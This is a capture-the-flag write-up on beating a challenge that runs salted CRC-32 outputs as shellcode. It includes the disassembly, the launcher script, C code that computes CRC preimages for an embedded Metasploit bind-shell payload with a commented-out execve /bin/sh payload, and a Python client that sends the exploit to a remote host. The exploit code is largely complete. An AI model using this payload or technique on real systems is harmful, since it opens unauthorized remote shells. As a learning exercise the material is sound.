This is a level that, at first, seemed like it would be extremely simple, but then turned out to be far more complicated than expected. We were provided a zip file containing a Python script and an ELF binary.
Disassembling the binary reveals a very basic program:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
/ (fcn) sym.main 165
| 0x0804847d 55 push ebp
| 0x0804847e 89e5 mov ebp, esp
| 0x08048480 83e4f0 and esp, 0xfffffff0
| 0x08048483 83ec30 sub esp, 0x30
| 0x08048486 8b450c mov eax, [ebp+0xc]
| 0x08048489 83c004 add eax, 0x4
| 0x0804848c 8b00 mov eax, [eax]
| 0x0804848e 890424 mov [esp], eax
| ; CODE (CALL) XREF from 0x08048376 (fcn.08048376)
| ; CODE (CALL) XREF from 0x08048370 (fcn.08048366)
| 0x08048491 e8dafeffff call 0x108048370 ; (sym.imp.atoi)
| sym.imp.atoi(unk)
| 0x08048496 89442428 mov [esp+0x28], eax
| 0x0804849a c7442424000. mov dword [esp+0x24], 0x0
| 0x080484a2 c7442408040. mov dword [esp+0x8], 0x4
| 0x080484aa 8d442424 lea eax, [esp+0x24]
| 0x080484ae 89442404 mov [esp+0x4], eax
| 0x080484b2 8b442428 mov eax, [esp+0x28]
| 0x080484b6 890424 mov [esp], eax
| ; CODE (CALL) XREF from 0x08048330 (fcn.0804832c)
| 0x080484b9 e872feffff call 0x108048330 ; (sym.imp.read)
| sym.imp.read()
| 0x080484be 8b442424 mov eax, [esp+0x24]
| 0x080484c2 c7442414000. mov dword [esp+0x14], 0x0
| 0x080484ca c7442410fff. mov dword [esp+0x10], 0xffffffff
| 0x080484d2 c744240c220. mov dword [esp+0xc], 0x22
| 0x080484da c7442408070. mov dword [esp+0x8], 0x7
| 0x080484e2 89442404 mov [esp+0x4], eax
| 0x080484e6 c7042400000. mov dword [esp], 0x0
| ; CODE (CALL) XREF from 0x08048350 (fcn.08048346)
| 0x080484ed e85efeffff call 0x108048350 ; (sym.imp.mmap)
| sym.imp.mmap()
| 0x080484f2 8944242c mov [esp+0x2c], eax
| 0x080484f6 8b442424 mov eax, [esp+0x24]
| 0x080484fa 89442408 mov [esp+0x8], eax
| 0x080484fe 8b44242c mov eax, [esp+0x2c]
| 0x08048502 89442404 mov [esp+0x4], eax
| 0x08048506 8b442428 mov eax, [esp+0x28]
| 0x0804850a 890424 mov [esp], eax
| 0x0804850d e81efeffff call 0x108048330 ; (sym.imp.read)
| sym.imp.read()
| 0x08048512 31c0 xor eax, eax
| 0x08048514 31c9 xor ecx, ecx
| 0x08048516 31d2 xor edx, edx
| 0x08048518 31db xor ebx, ebx
| 0x0804851a 31f6 xor esi, esi
| 0x0804851c 31ff xor edi, edi
\ 0x0804851e ff64242c jmp dword [esp+0x2c]
It takes a single argument, an integer, which it uses as a file descriptor for input. It first reads 4 bytes from that file descriptor and treats them as a length, mmaps an anonymous block of memory of that size with RWX permissions (prot 0x7), reads that many bytes from the file descriptor into the mapped region, and finally jumps to the mapped region. So, in summary: read the shellcode length, read the shellcode, then jump to the shellcode.
So, let’s look at the python script responsible for launching the program and reading the input.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#!/usr/bin/python
import os, signal, struct, binascii
from sys import stdin, stdout
def UI(a):
    """Unpack the byte string ``a`` as one native-order unsigned int."""
    (value,) = struct.unpack('I', a)
    return value


def PI(a):
    """Pack the integer ``a`` as one native-order unsigned int."""
    return struct.pack('I', a)


def crc32(data, salt):
    """Return the packed CRC-32 of ``salt + data``.

    The checksum is masked to the unsigned 32-bit range before packing.
    """
    checksum = binascii.crc32(salt + data) & 0xffffffff
    return PI(checksum)
def main() :
    """Collect blocks from stdin and feed their checksums to the binary.

    Prints a random salt, reads a block count followed by length-prefixed
    blocks from stdin, and joins the packed, salted CRC-32 of every block
    into one string. That string, preceded by its packed length, is
    written to a pipe whose read end is passed to /home/sc/thisisnotbad
    as its only argument.
    """
    # Schedule SIGALRM for this process 25 seconds from now.
    signal.alarm(25)
    salt = os.urandom(10)
    print 'salt:', salt.encode('hex')
    stdout.flush()
    # First 4 bytes on stdin: the number of blocks that follow.
    n = UI(stdin.read(4))
    # Each block is a 4-byte length followed by that many bytes; only the
    # packed CRC of salt + block is kept, never the block itself.
    data = ''.join(crc32(stdin.read(UI(stdin.read(4))), salt) for _ in xrange(n))
    fi, fo = os.pipe()
    if not os.fork() :
        # Child: exec the binary, passing the pipe's read end as a decimal
        # file-descriptor number.
        os.execl('/home/sc/thisisnotbad', 'thisisnotbad', '%d' % fi)
    else :
        # Parent: write the payload length first, then the payload.
        os.write(fo, PI(len(data)))
        os.write(fo, data)
if __name__ == '__main__' :
    main()
As you can tell, it prints a 10-byte salt, then reads 4 bytes (`n`), then finally reads `n` blocks, each prefixed by a 4-byte length. Next, for each block, it computes the CRC-32 of the block with the salt prepended. Finally, the CRC-32s are concatenated to form the shellcode to be executed.
So, to get useful shellcode, we have to mount a preimage attack on CRC-32. Fortunately, CRC-32 is not a cryptographically secure hash, and Julien Tinnes has done the heavy lifting for us. So, we can treat each 4-byte word of our shellcode as a desired CRC-32 value and, for each word, compute a 4-byte vector such that the CRC-32 of salt + vector equals that word. Each 4-byte vector is then sent as its own block, prefixed with the appropriate length.
I wrote a little C program to use the calcvect.c from tweakcrc to compute the preimages given the salt, then used python for all the socket communications. (Because why do sockets in C when you can avoid it?)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!c
#include "crc32.h"
#include <string.h>
#include <stdio.h>
#include <arpa/inet.h>
/* Earlier payload, disabled: pushes "//sh" and "/bin" and issues int 0x80
 * with al = 0x0b. Superseded by the larger payload below. */
/*
const char *shellcode = "\x31\xc0\x50\x68"
"\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50"
"\x53\x89\xe1\xb0"
"\x0b\xcd\x80\x90";
*/
/* Active payload: 80 bytes, consumed CHUNK_SIZE bytes at a time as the
 * desired CRC values. The trailing 0x90 bytes are x86 NOPs, presumably
 * padding the length to a multiple of CHUNK_SIZE. */
unsigned char shellcode[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a"
"\x02\x89\xe1\xb0\x66\xcd\x80\x5b"
"\x5e\x52\x68\x02\x00\x16\x9d\x6a"
"\x10\x51\x50\x89\xe1\x6a\x66\x58"
"\xcd\x80\x89\x41\x04\xb3\x04\xb0"
"\x66\xcd\x80\x43\xb0\x66\xcd\x80"
"\x93\x59\x6a\x3f\x58\xcd\x80\x49"
"\x79\xf8\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x50\x53"
"\x89\xe1\xb0\x0b\xcd\x80\x90\x90";
/* Payload bytes to process; excludes the literal's terminating NUL. */
#define SC_LEN 80
/* Bytes per CRC target, and per patch copied to the output. */
#define CHUNK_SIZE 4
/* One CHUNK_SIZE-byte patch per payload chunk, in payload order. */
char shellcode_out[SC_LEN];
/* Work buffer: bytes 0-9 hold the decoded salt, bytes 10-13 the patch. */
char tmpbuf[14];
/* Defined outside this file; called below with (buffer, buffer length,
 * desired CRC, offset of the 4 patch bytes). */
unsigned int tweakcrc(void *map, int length, unsigned int target, unsigned int offset);
/*
 * Decode a string of hex digit pairs into raw bytes.
 *
 * dst: output buffer; must have room for strlen(src) / 2 bytes.
 * src: NUL-terminated hex string. A trailing unpaired digit is ignored,
 *      and a pair that fails to parse leaves its dst byte untouched.
 */
void decode_hex(char *dst, const char *src) {
    /* Measure once; the length does not change while decoding. */
    size_t pairs = strlen(src) / 2;
    size_t i;
    for (i = 0; i < pairs; i++) {
        /* %hhx stores through an unsigned char *, so scan into one. */
        unsigned char byte;
        if (sscanf(src + i * 2, "%2hhx", &byte) == 1)
            dst[i] = (char)byte;
    }
}
/*
 * Usage: shellcode <salt-hex>
 *
 * For each CHUNK_SIZE-byte word of the payload, asks tweakcrc() to fill
 * bytes 10-13 of tmpbuf (the 4 bytes after the 10-byte salt) so that the
 * 14-byte buffer hits that word as its CRC target. The resulting patches
 * are printed as a single hex line on stdout.
 *
 * Returns 0 on success, 1 when the salt argument is missing or is not
 * exactly 20 hex digits (10 bytes).
 */
int main(int argc, char **argv) {
    int i;
    unsigned int target;

    /* Without this check a missing argument dereferences NULL, and an
     * over-long one is decoded past the end of the 14-byte tmpbuf. */
    if (argc < 2 || strlen(argv[1]) != 20) {
        fprintf(stderr, "usage: %s <20 hex digit salt>\n",
                argc > 0 ? argv[0] : "shellcode");
        return 1;
    }
    decode_hex(tmpbuf, argv[1]);
    gen_table();
    for (i = 0; i < (SC_LEN / CHUNK_SIZE); i++) {
        /* Clear the patch bytes before each solve. memset/memcpy avoid
         * int-pointer casts onto char buffers that need not be aligned. */
        memset(tmpbuf + 10, 0, CHUNK_SIZE);
        //for (k=0; k<14; k++)
        //fprintf(stderr, "%02hhx", tmpbuf[k]);
        //fprintf(stderr, "\n");
        memcpy(&target, &shellcode[i * CHUNK_SIZE], sizeof target);
        //target = htonl(target);
        //fprintf(stderr, "Target: %08x\n", target);
        tweakcrc(tmpbuf, 14, target, 10);
        //for (k=0; k<14; k++)
        //fprintf(stderr, "%02hhx", tmpbuf[k]);
        //fprintf(stderr, "\n");
        memcpy(&shellcode_out[i * CHUNK_SIZE], tmpbuf + 10, CHUNK_SIZE);
    }
    for (i = 0; i < SC_LEN; i++)
        printf("%02hhx", shellcode_out[i]);
    printf("\n");
    return 0;
}
You might notice a commented-out shellcode. At first, I just tried a basic x86 shell exec, but stdin/stdout do not seem to connect through to the shellcode. I didn’t dig into why; I just replaced my shellcode with linux/x86/shell_bind_tcp from Metasploit.
To chunk and send my payload:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!python
import socket
import subprocess
import struct
import binascii
def crc32(data, salt):
    """Return the CRC-32 of ``salt + data`` packed as an unsigned int.

    The checksum is masked to the unsigned 32-bit range before packing.
    """
    checksum = binascii.crc32(salt + data) & 0xffffffff
    # print (salt + data).encode('hex')
    packed = struct.pack('I', checksum)
    # print packed.encode('hex')
    return packed
REMOTE = ('54.178.232.195', 5757)
#REMOTE = ('localhost', 5555)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(REMOTE)
print 'Connected.'
salt = s.recv(1024).strip().split(':')[1].strip()
print 'Salt: %s' % salt
shellcode = subprocess.check_output(
('./shellcode', salt)).strip()
print 'Shellcode: %s' % shellcode
shellcode = shellcode.decode('hex')
def send(what):
print what.encode('hex')
return s.send(what)
def chunks(sc, size=4):
    """Split ``sc`` into consecutive pieces of ``size`` items.

    The final piece is shorter when ``len(sc)`` is not a multiple of
    ``size``; empty input gives an empty list. ``size`` defaults to 4 and
    must be positive.

    Raises:
        ValueError: if ``size`` is not positive.
    """
    if size <= 0:
        raise ValueError('size must be positive')
    # range() rather than xrange() so this runs on Python 2 and Python 3.
    return [sc[x:x + size] for x in range(0, len(sc), size)]
nc = len(shellcode)/4
shellcode = ''.join('\x04\x00\x00\x00' + c for c in chunks(shellcode))
l = send(struct.pack('I', nc) + shellcode)
print 'Shellcode %d done.' % l
You might notice both programs have a lot of debugging print statements. Getting the endianness just right, tweaking the payload chunking, etc., consumed far more time than figuring out what the problem was.